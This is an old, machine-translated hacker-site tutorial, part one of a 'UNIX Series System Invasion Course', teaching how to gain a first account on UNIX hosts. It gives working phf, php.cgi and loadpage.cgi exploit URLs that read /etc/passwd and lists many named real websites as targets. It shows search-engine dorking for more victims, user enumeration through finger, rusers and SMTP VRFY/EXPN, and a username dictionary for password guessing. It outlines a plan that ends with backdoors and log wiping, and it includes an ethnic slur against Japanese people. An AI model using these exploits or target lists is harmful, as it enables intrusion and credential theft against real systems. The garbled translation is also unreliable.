"UNIX Series System Invasion Course" |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> "UNIX Series System 
                  Invasion Course" one  Printing

            "UNIX Series System Invasion Course" one 
            Www.cshu.net  2002-8-28  fog rain village 

              "UNIX Series System Invasion Course" one 
              ------------------ Nimble use resources
              ==========================================
              My first about U the N I X course, I wants to say besides looks 
              for the first account number, but also some - - - nimble use 
              resources.
              Perhaps you will feel strange, what relations this "nimbly and U N 
              I X does have using the resources"?
              Yes, indeed does not have any very big relations.
              But this is my experience introduction.
              The nimble use existing resources, we work can achieve the twice 
              the result with half the effort effect.
              Perhaps, your still did not understand my meaning.
              Do not be anxious. is coming with me.
              :)
              Believed everybody knows that famous loophole: Phf
              Loophole description: (In 1.1.1 editions) in non- commercial 
              edition Web Server have section of procedures util.c in NCSA or 
              Apache, allows the hacker to carry out any instruction by the root 
              status
              Http://www.xxx.com/cgi-bin/phf? Qname=root%0Asome%20command%20here
              Http://www.victim.com/cgi-bin/phf? 
              Qalias=x%0a/bin/cat%20/etc/passwd
              This is four year ago the loophole, we also have now been able to 
              find him?
              The answer is:
              Certainly may! :)
              Http://www.mohall.k12.nd.us/cgi-bin/phf? 
              Qalias=x%0a/bin/cat%20/etc/passwd
              This is.
              Everybody may have a look, not to have shadow the password files. 
              Good. Looked like according to the password files that, this 
              website is not very big.
              Again looks at.
              Http://www.grex.org/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd
              Suffices the fat chicken. 2,395 users, faint......
              Everybody slowly looks for software completely to run, small 
              banyan tree's chaotic knife also very good.
              This loophole may be direct long-distance executes the order oh, 
              detailed situation everybody looks at "80 Ports Invasions" this 
              article.
              After found the user password, you also may telent or ftp have a 
              look oh.
              Or simply black it.
              Ha-ha
              But, I am cannot do.
              Everybody feels strange?
              All any age, but also has this loophole.
              How do I am discover?
              Do not be anxious
              And so on tells you.
              Name: Php.cgi 2.0beta10 or earlier edition
              Description: Including buffer overflow loophole, but also has 
              causes any system document to be allowed by the intruder the 
              loophole which reads by the nobody jurisdiction takes.
              Http://www.victim.com/cgi-bin/php.cgi? /etc/passwd the php.cgi2.1 
              edition only could read the shtml document Regarding the 
              cryptographic document, comrades want to pay attention to, perhaps 
              possibly in /etc/master.passwd /etc/security/passwd and so on
              This loophole everybody also very familiar, also was very old.
              We equally may find have this loophole the main engine.
              Http://hellas.me.ntou.edu.tw/cgi-bin/php.cgi? /etc/passwd
              :) A Taiwan's fellow.
              Http://www.pcsc.net/cgi-bin/php.cgi? /etc/passwd
              Does not know any website.
              Http://www.ccchubu.co.jp/cgi-bin/php.cgi? /etc/passwd
              The Japanese devil, his mother, we flush give them two feet!
              Everybody also wants?
              Http://www.lifesupportal.com/cgi-bin/php.cgi? /etc/passwd
              Http://www.ub.fu-berlin.de/cgi-bin/php.cgi? /etc/passwd
              Http://www.compfutures.com/cgi-bin/php.cgi? /etc/passwd
              Http://edu.larc.nasa.gov/cgi-bin/php.cgi? /etc/passwd
              Http://edu.larc.nasa.gov/cgi-bin/php.cgi? /etc/passwd
              This php.cgi loophole only can read the document.
              We or run the password with the chaotic knife.
              After found the user password, you also may telent or ftp oh.
              How do I also am discover?
              Do not be anxious
              And so on tells you.
              Name: Loadpage.cgi
              Description: May use for to examine the free document, first uses 
              the browser to find the current way,
              Http://www.example.com/cgi-bin/loadpage.cgi? User_id=1&file=XYZ 
              possibly could return to a wrong information by now: Cannot open 
              file /home/www/shop/XYZ
              Now may replace for the under form,
              Http://www.example.com/cgi-bin/loadpage.cgi? User_id=1&file=../.. 
              /< way >/< filename >
              Specifically as follows:
              Http://www.example.com/cgi-bin/loadpage.cgi? User_id=1&file=../.. 
              /etc/passwd
              Everybody has a look:
              Http://www.valueindia.com.au/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../../.. /etc/passwd
              Oh, his mother, @#$%@$@#%$! ~... ...
              Most recent several days I also may read the password files.
              Now possibly got the patch, or has erased, or on is filtered by 
              the firewall.
              I depend on, we have a look another.
              Http://www.bigfivestuff.com/cgi-bin/loadpage.cgi? 
              User_id=1&file=../.. /etc/passwd
              Mmm, why is 500 mistakes?
              In the loophole handbook is such.
              Ha-ha
              We must nimbly apply, is the way question.
              We alter to: Http://www.bigfivestuff.com/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../.. /etc/passwd
              Cannot open file 
              /usr/local/etc/httpd/htdocs/bigfivestuff/store//../.. /etc/passwd
              ? ?
              Or way question.
              Our way insufficiently is thorough.
              The current directory is in: 
              /usr/local/etc/httpd/htdocs/bigfivestuff/store/
              /../.. /etc/passwd only upwardly jumps two.
              Also is in /usr/local/etc/httpd/htdocs/
              Also some five tables of contents.
              We increase five "../"
              Http://www.bigfivestuff.com/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../.. /etc/passwd
              Everybody has seen?
              Password files
              But was shadow.
              We equally may use the time production user to tabulate then F T 
              the P simple survey.
              :)
              Everybody also wants?
              Http://qtb.com/cgi-bin/loadpage.cgi? User_id=1&file=../../../.. 
              /etc/passwd
              Http://www.bigfivestuff.com/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../../.. /etc/passwd
              Http://www.cheapcellphones.com/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../../.. /etc/passwd
              Http://www.boutiquesensuale.net/cgi-bin/loadpage.cgi? 
              User_id=1&file=../../../.. /etc/passwd
              Http://www.patches3.com/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../../.. /etc/passwd
              Http://www.topten.it/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../../.. /etc/passwd
              Http://www.palmcentre.co.uk/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../../.. /etc/passwd
              Http://www.storefinder.com/cgi-bin/loadpage.cgi? 
              User_id=1&file=/../../../../../../../.. /etc/passwd
              Sufficed your corona
              Big pile of password files
              I said how I am did find.
              :) We enter http://www.google.com/ (a very good search engine)
              Certainly you also may use http://www.yahoo.com
              In inputs in the frame we to input the /cgi-bin/phf then carriage 
              return
              We can discover the similar following content the page.
              Searched /cgi-bin/phf. to Internet altogether approximately to 
              have 7,,320 inquiries results, this is the 1-10th item. Search 
              with time 0.08 second.
              Category: Regional > North America >... > DOE National 
              Laboratories > Ames Laboratory
              Untitled
              Lcweb.loc.gov/cgi-bin/phf/ - similar homepage
              Untitled
              Lcweb.loc.gov/cgi-bin/phf - similar homepage
              Ames Phone Book - People
              Category: Regional > North America >... > DOE National 
              Laboratories >
              Ames Laboratory
              Ph.iastate.edu/cgi-bin/phf - similar homepage
              These websites all have /cgi-bin/phf
              Above also has the possibility their edition just to have loophole 
              that, but has not had the patch!
              We try http://xxx.xxxxxxxx.xxx/cgi-bin/phf? 
              Qalias=x%0a/bin/cat%20/etc/passwd
              Not good tries to search /cgi-bin/php.cgi /cgi-bin/loadpage.cgi
              Certainly you also may try other similar loopholes.
              Interlocks the net to be such big, always can find has!
              But we did this too stupidly.
              This is not the new loophole after all, had to find to be able to 
              use too to be difficult.
              But we why thought?
              If recent discovery any loophole may straight respectfully 
              received and read takes the document or the movement order, we 
              equally may use the search engine to find have this loophole the 
              main engine.
              Why three year ago loophole can we also see?
              All is likely dissimilar on each people, certainly certainly is 
              not each network management all very responsible. :)
              Also, if you have any loophole not to understand, or you must look 
              for any material software and so on, also equally may look using 
              the search engine!
              For instance, we to twwwscan scan result: Frontpage98 Hole 
              (_vti_inf.html) did not understand that, we may input 
              _vti_inf.html in the search engine, you definitely may find very 
              many related articles and the material.
              This was a small know-how. :)
              Because these engines materials all are, he which looks with the 
              robot unceasingly renews and the increase. This robot is not any 
              robot which we usually hears, he is the network worm procedure 
              which arranges with perl or other languages, also some people look 
              for the e-mail address with these procedures. O K, I got off the 
              subject.
              We use these engines, believed everybody can find the thing which 
              are very many you to want!
              Good, changes over to the subject. :)
              Believed everybody did not know should study any thing.
              Under is the very good introduction.
              1. Can use C.C++ perl or other languages carries on the 
              programming.
              Said to an hacker that, this is the basic request. The very many 
              securities tool all is compiles with C/C++ or the perl language. 
              The primary hacker at least must be able to understand, the 
              translation, the execution and skilled utilizes these procedures. 
              You can use these ready-made tools to attack. Goes a step further, 
              you also must have can transplant certain software to other 
              platforms abilities, or, you must have the development the 
              ability. For instance, develops some new tools or expands on the 
              original tool!
              2. Familiar TCP/IP agreement.
              This also is an hacker wants the necessary quality. Has not 
              discussed itself to the agreement harmonious cooperation correct 
              thorough understanding, but only can carelessly make do daily 
              using the tool, then you never can have the progress. Some to the 
              Internet principle of work basic understanding, you even more does 
              not only need to discuss any attack. The study agreement knowledge 
              way first is familiar with RFC, here has a place to be allowed: 
              Http://www.attrition.org/~modify/texts/rfc/
              3. Familiar two kind of above operating system.
              For instance NT/2000 Linux Unix Sunos and so on.
              The UNIX series is must understand one kind.
              4. Tracks the newest loophole material and the tool.
              Many pays attention to the on-line announcement the loophole 
              material and the tool.
              The domestic response quite is on the other hand slow.
              Recommends everybody to go: Http://www.securityfocus.com/
              5. Must become the hacker, must begin Hacking.
              Besides looked the invasion course, after looked then certainly 
              wants own to begin! Only has oneself begins hacking. You can have 
              the progress. Only has the process massive practices, you can 
              skilled utilize each method of attack. Is an armchair strategist 
              is useless. Looked many courses you do not begin also are useless! 
              Or knows nothing about in the end!
              6. The person only depends on oneself.
              Very many &#32593; increase after me the good friend, the first speech 
              is: "I do obeisance you for the teacher?" : (I but actually, also 
              comes.
              When you thoroughly study the Hack technology, you can discover 
              oneself understands are less! I truly understand am not certainly 
              many. I really also do not have the ability to be you teacher, I 
              am only a very ordinary network technology amateur. Do not look at 
              me too high. Perhaps I am the most vegetable. :)
              Actually, certainly is not all people all looks like you that to 
              have spatial, each people all have the work, all has own matter, 
              nobody can completely consider for you! Also nobody is willing the 
              time flower above the such bored matter. Everybody should stand in 
              another angle looked, if simultaneously has 20 personally and you 
              chats on O I C Q, how you can? 50 100? You can deal with?
              At the same time, very many people also can ask me to break a code 
              the mailbox chatroom OICQ password, the chatroom kick the 
              person.... Really is bored, I eat to the full am all right do, 
              also cannot bored make these repetitions not to have the 
              significance the matter, calculated you have broken 10,000 
              passwords, what did you kick 10,000 individual to be able to 
              explain you? The friends, do not have preciously to waste you to 
              access the net the time! Does some significant the thing.
              Generally our hacking step is:
              1. Data collection
              2. Long-distance attack
              3. Long-distance lands
              4. Obtains the average consumer the jurisdiction
              5. Obtains the super user the jurisdiction
              6. Leaves behind the back door
              7. Elimination diary
              May simple dividing into:
              1. Obtains the first account number
              2. Obtains the super user jurisdiction
              3. Leaves behind the back door
              4. Scratches "the footprint"
              We today said how found our first account number!
              (1) First we first set a target, for instance reactionary stand! 
              If does not have any concrete goal, uses me to issue everybody 
              Superscan 3.0 to sinicize the version to scan section of webpages, 
              the search main engine. I like with it scanning 79 ports. It scans 
              the production the material to be very good. With were many has 
              been able to know. :) We also may use the search engine to look! 
              For instance we input Japan in the engine, may find a big pile to 
              concern Japanese the website and the homepage. Then we look for in 
              middle to try. :)
              (2) Then is the acquisition of information. After determined our 
              goal, we must carry on a series of scannings to him. For instance 
              3.0 carries on the port scanning with Superscan. Carries on the 
              WEB loophole with Twwwscan to scan. With Nmap, Saint, Satan or 
              other some scanners carry on the entire aspect to the goal the 
              scanning. Just started when we said were a very good example, 
              looked had any loophole to be able directly to obtain the password 
              files or to execute the order! This may save very many matters.
              1. First we possibly can first a ping main engine! Judges the main 
              engine the type.
              For instance we: Ping www.eee.com.tw # supposition address:)
              Pinging www.eee.com.tw [ 203.69.121. *** ] with 32 bytes of data:
              Reply from 203.69.121. ***: Bytes=32 time=60ms TTL=243
              Reply from 203.69.121. ***: Bytes=32 time=60ms TTL=243
              Reply from 203.69.121. ***: Bytes=32 time=80ms TTL=243
              Reply from 203.69.121. ***: Bytes=32 time=70ms TTL=243
              Ping statistics for 203.69.121. ***: Packets: Sent = 4, Received = 
              4, Lost = 0 (0% loss), Approximate round trip times in 
              milli-seconds:
              Minimum = 60ms, Maximum = 80ms, Average = 67ms
              We may see time=60ms is the time which uses, reflects with the 
              goal machine speed.
              We may see TTL=243 we may come probably to see the machine the 
              type. Sunos 5.6. If TTL=128 is Win2000. These everybody usually 
              also may as soon as pay attention. :) Slowly accumulates.
              After 2. Ping machine, we have carried on the port scanning to the 
              goal, mainly will be is discovers the service port through the 
              scanning which the goal system opens thus to infer the service 
              which on the goal system moves, again acts according to these 
              service search related materials. The port scanning has very many, 
              what I am commonly used is spits blood recommendation Superscan to 
              everybody 3.0, the commonly used port includes: 21=ftp, 23=telent, 
              25=smtp, 79=finger, 110=pop3, 111=sunrpc, 513=login, 514=shell, 
              515=printer. . .
              21 ftp port, we possibly can associate the wu-ftp2.X long-distance 
              overflow.
              23 telnet port, at least we knew may long-distance land executes 
              the order, telnet ip has a look the system information. :)
              25 smtp port, may confirm the user, but also has the sendmail 
              series the loophole.
              79 finger port, we may use this port to tabulate the main engine 
              the user material. :)
              110 pop3 port, I think he useless.
              111 rpc port, tries some famous long-distance overflows.
              513 may use rlogin, or has the machine has been already made by 
              the person rhosts the back door. :) Also tries rlogin the 
              long-distance overflow oh.
              514 is similar with rlogin, but he does not need to land. :)
              515 networks printings? Tries netpr.c:)
              . . .
              All these services or free provides to the outside about the 
              system important knowledge, either provides some kind to enable 
              the user to be allowed "to register" to the system method, either 
              causes the user to be allowed in the long-distance execution 
              system procedure, therefore all has the possibility is the network 
              invasion important way.
              3. After we generally scan the port, has opened 23 telent, telnet 
              ip has a look the system edition information, then has a look this 
              edition to have any significant loophole again. :)
              Telnet www.eee.com.tw
              We may see the similar information:
              SunOS 5.6
              Login:
              We may see it is Sunos 5.6.
              Then we thought what good use this edition does have the loophole? 
              :)
              This machine has also opened 79 ends, we come finger he,
              This is most primitive also is most effective obtains the first 
              user account the method.
              We carry out under Linux/UNIX/NT, Win9x cannot.
              Finger @www.eee.com.tw
              Has a look to have the on-line user.
              [ www.eee.com.tw ]
              No one logged on
              Nobody on-line.
              Finger @www.eee.com.tw
              [ www.epson.com.tw ]
              Login Name TTY Idle When Where
              Robert RD <.... >
              Rd-1 RD <.... >
              Rd-2 RD <.... >
              Rd-3 RD <.... >
              Rd-4 RD <.... >
              Agent all agents login 0 ettdb
              Artwork? ? ? <.... >
              Oracle? ? ? 287
              Eee survey? ? ? Pts/2 epson5
              Eeeclub? ? ? <.... >
              Webadm? ? ? Pts/1 eee5
              Agtrpt all agents login <.... >
              Genuine? ? ? 791 ettdb
              Weblink? ? ? 349 eee5
              Wardpro? ? ? 791 ettdb
              Nstark? ? ? Pts/1 eee5
              Eee? ? ? Pts/2 202.111.143. *
              Cbgmaster? ? ? Pts/2 210.12.11. *
              Our good thing came out.
              Under Login is on the main engine user!
              We also may finger username@www.eee.com.tw tell fortunes by 
              physiognomy the corresponding user the material. :)
              Finger cbgmaster@www.eee.com.tw
              Everybody may look for a machine to try.
              202.228.128.34
              202.228.128.33
              202.228.128.35
              202.228.128.36
              202.228.128.38
              202.228.128.39
              202.228.129.21
              Small Japan may finger I P
              Everybody has a look.
              About Win9x finger, we may use software to realize. For instance 
              the day good network assassin 2, and overcomes nature net finerf.
              Here I recommend finerf.
              Everybody may arrive here to download: 
              Http://www.cnhonker.com/finger.zip
              First &#26432;Ը oh. :)
              3.0 scans 79 ports under win9x with Superscan, then obtains the 
              user with fingerf is a very good coordination!
              If finger comes out the user too are many, we may use the young 
              banyan tree time ftp to survey help us to confirm.
              Generally speaking, permits ftp the also permission on the main 
              engine telnet.
              We also may use rusers to order, "remote users", as the name 
              suggests, namely the inquiry long-distance main engine about its 
              user's information, has with finger is similar place.
              Rusers -l www.eee.com.tw
              Root www.eee.com.tw:console May 7 10:03 22 (:0)
              John www.eee.com.tw:pts/6 May 7 12:56 26 (mor.com)
              Will www.eee.com.tw:pts/7 May 7 10:11 (zw.com)
              Mary www.eee.com.tw:pts/11 May 7 09:53 3:37 (foo.com)
              Paul www.eee.com.tw:pts/10 May 7 13:08 18 (sil.com)
              Lists on www.eee.com.tw all active user
              Here this orders us only to be able to use under linux/Unix.
              Therefore, we best own install linux.
              Through 25 ports definite users.
              Telnet www.eee.com.tw 25
              Trying xxx.xxx.xxx.xxx...
              Connected to www.eee.com.tw.
              Escape character is '^ ] '.
              220 numen.com ESMTP Sendmail 8.9.1b+Sun/8.9.1; Fri, 7 May 1,999 
              14:01:39 +0,800
              (CST)
              Expn root
              250 Super-User 
              Expn eee
              250 
              Vrfy www
              550 www... User unknown
              Uses "vrfy" or "expn the" order, may judge specific user whether 
              has on the main engine,
              If above "root, eee" primarily machine on exists the user, "www" 
              is a user which does not exist.
              Its use lies in: If cannot use finger or rusers obtains on the 
              goal main engine the user to tabulate, may use this method to 
              guess user
              Through guessed some commonly used account numbers, we determined 
              the main engine exists user.
              Then we can explain through this account number.
              Also, we usually also may have a look the domain name, main 
              engine, the main page relation mailbox guesses user.
              Main engine we may see through ftp.
              C:\>ftp www.eee.com.tw
              Connected to www.eee.com.tw.
              220 eee FTP server (SunOS 5.6) ready.
              ===eee is main engine!
              User (www.eee.com.tw: (none)):
              Certainly we also may guess some commonly used user try the main 
              engine the password.
              Under is the account number information which I common arrives. 
              Everybody may refer.
              Root admin sys guest ftp system system32 smtp mail site linux 
              daemon bin test www adm html web webmaster anon oracle sybase 
              database install john reboot tom sync info infomix public webadm 
              webadmin server user and so on
              Everybody definitely may make a commonly used account number 
              dictionary to use ftp to survey the password.
              Oracle user tacitly approves the password is oracle
              Bumped into many you to be able to discover very many passwords 
              have not all changed!
              4. Certainly we also must carry on some loopholes to opposite 
              party to scan. In order to has a look us to have any to be allowed 
              the direct use loophole. Omitted decrypts. Twwwscan scans the web 
              loophole to be good. For instance has a look to have the commonly 
              used php.cgi loophole. Other some comprehensive formidable 
              scannings needed to use scanner and so on nmap.satan. For instance 
              rpc loophole and so on. These procedures all may look through the 
              search engine!
              5. The key is our usually knowledge accumulation, determined a 
              goal, knew its system and the service, we can think its related 
              loophole material is best. Certainly our highest boundary 
              discovers the loophole.


              Original author: Huc 
              Origin: Huc 
              Altogether has 167 readers to read this article 

              [Tells friend] 
            Previous article: Already did not have 

            Next article:"UNIX Series System Invasion Course" two 

            - this week popular article - related article 
            Gains your first account number
            "UNIX Invasion Process"
            "UNIX Series System Invasion Course" three
            "UNIX Series System Invasion Course" two
            "UNIX Series System Invasion Course" one 



      CSHU 
